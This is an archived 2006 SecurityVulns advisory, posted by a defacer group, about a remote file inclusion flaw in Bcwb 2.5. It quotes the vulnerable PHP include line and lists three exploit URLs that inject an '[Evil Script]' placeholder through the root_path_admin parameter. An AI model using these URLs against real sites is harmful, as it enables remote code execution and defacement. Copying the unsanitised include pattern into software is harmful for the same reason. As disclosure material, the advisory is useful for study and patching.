Multiple Remote File Include

2006-10-31T00:00:00
ID SECURITYVULNS:DOC:14867
Type securityvulns
Reporter Securityvulns
Modified 2006-10-31T00:00:00

Description

################# Firewall
  Bcwb 2.5 - Multiple File Include by Firewall
         Latin  American  Defacers
           BuG FounD by Firewall

Application Affect:

                Bcwb 2.5

Sorce Code:

     http://prdownloads.sourceforge.net/bcwb/bcwb_v25.zip?download

Code:

   if(! include($root_path_admin.'lang/'.$default_language.'.inc.php') ) die("Can't include ".$root_path.'lang/'.$default_language.'.inc.php');

ExPloit :

http://www.site.com/Bcwb_PATH/include/startup.inc.php?root_path_admin=[Evil Script]

http://www.site.com/Bcwb_PATH/dcontent/default.css.php?root_path_admin=[Evil Script]

http://www.site.com/Bcwb_PATH/system/default.css.php?root_path_admin=[Evil Script]

GrEatZ :LAD,C-group,Her0,slackwaren,slappter,Cvir.System,Hanowars,ANtrAX

,napster,saok,Zlevyn,FaLENcE,Azrael,CyberAlexis,krhonoz,RaDaM4nTySS.

################# Firewall